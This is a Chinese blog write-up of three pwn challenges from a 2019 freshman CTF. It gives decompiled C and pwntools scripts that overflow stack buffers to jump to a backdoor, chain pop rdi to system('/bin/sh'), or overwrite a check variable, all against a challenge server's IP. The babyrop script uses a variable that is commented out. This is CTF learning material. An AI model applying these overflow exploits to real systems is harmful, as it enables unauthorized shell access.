2019新生杯 pwn writeup

最新推荐文章于 2022-12-28 20:50:15 发布
最新推荐文章于 2022-12-28 20:50:15 发布
阅读量609 收藏 1
点赞数
分类专栏: # pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43092232/article/details/103129646
版权

新生杯被吊打,大佬们tql…本来周五打完就应该写wp的,颓废了一个周末,周一晚上开始写。
wp分开吧,每个方向一个wp(不是全栈!!!)
其实pwn题目有点坑…前面的没学过二进制的web手也能做,后面两题做出来的人就很少(主要是我太菜了)
五道pwn题在文末都有网盘链接

**

0x00 babyrip

**
IDA看一下主要函数

int pwn()
{
  char v1; // [rsp+0h] [rbp-F0h]

  printf("Enter your comment:");
  __isoc99_scanf("%256s", &v1);
  return puts("Got shell?");
}

int backd00r()
{
  return execve("/bin/sh", 0LL, 0LL);
}

能溢出,还给了后门函数…很友好

使用pwndbg里面的cyclic看一下溢出需要多少字节(junk=248*‘A’)
再找到execve("/bin/sh")的地址,溢出getshell

exp:
from pwn import *
context.log_level = 'debug'
p = remote("34.80.207.78",10000)
junk =248*"A"
sys_addr = 0x04007D5
payload = junk + p64(sys_addr)
p.send(payload)
p.interactive()

0x01 babyrop

这道题用到了简单的rop,做这题的时候还去网上搜了下rop链的构造。
这题就很简单了:溢出+pop rdi+传入binsh地址+调用system函数
64位程序,rdi是函数调用的第一个参数,先pop rdi再把binsh地址放进rdi中。

exp:
from pwn import *
context.log_level = 'debug'
p = process("./babyrop")
#.attach(p,' ')
r = remote("34.80.207.78",10001)
junk = 0xf8 * "A"
#bin_addr =0x0400836
sys_addr = 0x0400724
pop_rdi = 0x0400803
payload = junk +p64(pop_rdi)+p64(bin_addr)+p64(sys_addr)
r.send(payload)
r.interactive()

在这里插入图片描述
先下断点再利用search -s寻找"/bin/sh"

0x02 babystack

做了两题觉得第三题应该会放难一点的…没想到跟第一题一样(溢出+变量覆盖,刚开始溢出字节算错了一直在想着怎么绕过canary)
先IDA里面看一下主要函数:

unsigned __int64 pwn()
{
  char s; // [rsp+0h] [rbp-120h]
  __int64 v2; // [rsp+18h] [rbp-108h]
  __int64 v3; // [rsp+110h] [rbp-10h]
  unsigned __int64 v4; // [rsp+118h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(&s, 0, 0x110uLL);
  v3 = 180097847LL;
  printf("Enter your name:", 0LL);
  read(0, &s, 0x18uLL);
  printf("Enter your comment:", &s);
  read(0, &v2, 0x100uLL);
  printf("Hello, %s, your comment is %s.\n", &s, &v2);
  if ( v3 == 20150972 )
  {
    puts("you are an eligible user to obtain shell prompt.");
    system("/bin/sh");
  }
  else
  {
    puts("you don't have permission to access shell.");
  }
  return __readfsqword(0x28u) ^ v4;
}

漏洞利用过程:输入name+填充junk字节+变量覆盖即可getshell

exp:
from pwn import *
context(arch='amd64',os='linux',log_level="debug")
r = remote("34.80.207.78",10002)
r.recv()
r.sendline("match")
r.recv()
r.sendline("a"*0xf8+p64(0x1337ABC))
r.interactive()

0x03 syscall

0x04 inversion

链接:https://pan.baidu.com/s/1vya52A8ulQKDNgoQfkgVSw 
提取码:gbqk
_n19hT
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2020网鼎.zip
07-20
2020网鼎 逆向 pwn 密码 隐写赛题,除web外均有
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
PWN 强网2020siri 题目
09-21
PWN 强网2020siri 题目
安恒pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
2020 蓝帽线下赛PWN WriteUp .pdf
09-05
2020 蓝帽线下赛PWN WriteUp 安全测试 企业安全 安全架构 自动化 安全防御
[NiteCTF 2022] 部分
weixin_52640415的博客
12-28 726
NiteCTF 2022 crypto,rev,pwn部分
广西首届网络安全选拔赛PWN、REVERSE、决赛题目
热门推荐
zrools的博客
02-03 1万+
逆向和溢出没太多研究(无flag的为未解出),这两类和决赛题目放一起以减少篇幅!溢出类(PWN) PWN 在黑客俚语中代表着,攻破,取得权限,在CTF中它代表着溢出类的题目。 高水平溢出 分值:500 附件:55ed7cb0866ec 靶机:192.168.43.84 小张由于电脑被入侵,下场很惨,于是专心学习溢出,只是没想到从网上经过别人指点找到这个东东,完全不知道是什么。当时小张就瞬间蒙逼了
[PWN][基础篇]保护函数和溢出实例
网络安全知识分享
03-19 4890
[PWN][基础篇]保护函数和溢出实例一、常见的保护1、CANNARY(栈保护)2、NX(DEP)3、PIE(ASLR)二、神奇的小知识1、如何检查文件的保护情况2、编译时如何关闭这些保护呢3、查看程序使用了哪些函数三、实例教学 一、常见的保护 1、CANNARY(栈保护) 栈溢出保护是一种缓冲区溢攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行,当启动栈保护后,函数开始执行的时候会显往栈里插入cookie的信息,当函数真正返回的时候会验证cook
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 2944
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
CTF-PWN-babysc(Hgame)
SuperGate的博客
02-04 731
直接运行该程序,发现没有任何提示信息,随便输入一串字符之后,程序错误退出。 扔进ida查看: 程序用read函数读入buf,然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量,buf长度为80 然后对于buf[i] ,异或buf[i]^(i+1),最后将buf蕴含的指令赋值给rdx并执行。 我们可以考虑直接构造system(/bin/sh...
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
强网2022 pwn 赛题解析.docx
最新发布
12-18
强网
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
2017湖湘pwn400
12-09
2017湖湘pwn400的pwn题目,喜欢的就下载下来做一下。。
2017湖湘pwn300
12-03
2017湖湘pwn300的题目,请大家自行下载。。。。。。
2020YCBCTF:2020羊城官方writeup及
03-24
2020年 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
赣网2021_pwn2.rar
12-11
赣网2021 pwn1 bin ctf
2017湖湘pwn200
12-02
2017湖湘pwn200的题目,请大家自行下载。。。。。。
讲解一下pwn 2019第五空间
04-02
Pwn 2019第五空间是一场CTF比赛中的一道题目。该题目为二进制漏洞利用类题目,需要利用二进制程序中的漏洞进行攻击,获取程序的控制权。 该题目中提供了一个二进制文件,玩家需要对该文件进行分析,找出其中的漏洞并进行利用。分析过程中需要使用调试工具、反汇编工具等,以便深入理解程序的执行过程。 在这个题目中,玩家需要利用程序中的缓冲区溢出漏洞,通过向缓冲区中输入恶意代码,实现对程序的控制。具体来说,玩家需要构造一个恶意输入,使得程序在执行过程中跳转到指定的地址,并执行指定的代码,从而获取程序的控制权。 该题目难度较高,需要玩家具备较强的二进制漏洞利用能力和调试能力。同时,该题目也为玩家提供了一个锻炼自己技能的机会,帮助玩家提高对二进制漏洞利用的理解和掌握。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_n19hT

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值